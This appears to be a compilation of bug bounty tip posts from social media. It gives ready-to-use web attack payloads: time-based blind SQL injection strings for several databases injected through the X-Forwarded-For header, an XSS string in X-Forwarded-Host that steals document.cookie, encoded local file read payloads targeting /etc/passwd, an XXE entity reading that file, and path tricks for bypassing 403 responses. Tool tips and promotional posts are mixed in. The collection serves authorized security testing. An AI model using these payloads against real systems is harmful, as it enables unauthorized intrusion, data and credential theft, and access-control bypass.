I found 2 Blind time-based SQL Injections in X-Forwarded-For: header just using Burp Intruder. Made a list of 500+ HTTP request and tested one by one for 3+ hours, here is the result.. X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z #BugBounty

7 SQLs 4 in php (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ 1 in aspx orwa';%20waitfor%20delay%20'0:0:6'%20--%20 2 in graphql orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))-- #bugbountytips #bugbountytip 💕

Burp suite config for new project Add header response replace - 301, 302 Found => 200 OK - 403 Forbidden => 200 OK - Remove some noises response headers - :false => :true magic - xss text replace for testing xss Del noises ext: svg,ico,woff pastebin.com/Q7twpiJZ #bugbountytips

Another day another bug 🔥 This time we found #XXE in a PHP application by searching for the string: libxml_disable_entity_loader(false) It indicates that external XML entities are able to be loaded. Add it to your list :) #bugbounty #bugbountytips #Hacking

Header based injection: X-Forwarded-Host: evil.com"><img src/onerror=prompt(document.cookie)> X-Forwarded-Host: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z Referer:

Tip for finding SQLi in NodeJS code 🔥 1. Identify the ORM the developers used (like knex or sequelize). 2. Focus on the unsafe methods of the specific ORM: query(), run(), execute(), raw() 3. Check for input processing and craft your payload 🥷 #BugBounty #bugbountytips #Hacking

Payloads for LFR/LFD ⚔️ file:/etc/passwd%3F/ file:/etc%252Fpasswd/ file:/etc%252Fpasswd%3F/ file:///etc/%3F/../passwd file:${br}/et${u}c%252Fpas${te}swd%3F/ file:$(br)/et$(u)c%252Fpas$(te)swd%3F/ #infosec #cybersec #bugbountytips

SQL Injection by Headers⚔️ #infosec #cybersec #bugbountytips

🔖 GAU - A Must-Have Tool for Initial Recon 🚀 ✨ Highlights: •Extract various file types like .php, .json, .js, and more effortlessly during recon. •Perfect for bug bounty hunters and security researchers. #BugBounty #bugbountytips

⚡Tips on bypassing 403 and 401 Error! 👉Credit Arpeet Rathi 🇮🇳 #bugbounty #bugbountytip #bugbountytips

📝 If you are interested in learning about Secure Code Reviews, watch this video. This video gets you a basic idea of finding Path Traversal Vulnerabilities in code, Tutorial: youtube.com/watch?v=aoXAc7…

Microsoft is Offering FREE Azure 2025 Certification Courses! No Fee, Completely Free These 20 Courses Includes Video Tutorials, Hand's on Labs and Notes. Don't miss these courses if you want to make your career in 2025:

Bug Bounty Tip : XML External Entity(XXE) 1.Go to the file upload functionality in the application. 2.Upload a XML file <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <test>&xxe;</test> 3.Use Burp Suite to intercept the request and modify content type.

403 bypass methodology ! 1- using space symbols exmaple: /admin -> 403 /admin%09 -> 200 /admin%20 -> 200 2- use traversal Example: /admin -> 403 /..;/admin -> 200 you can fuzz with traversal sometimes that's end with results Example: /..;/FUZZ #bugbountytips by VIEH Group

🎉 Happy New Year! We’re kicking off 2025 with a new plugin in the Caido Store! Introducing “Param Finder” by bebiks—discover hidden parameters in Caido with ease. Check it out: github.com/bebiksior/para…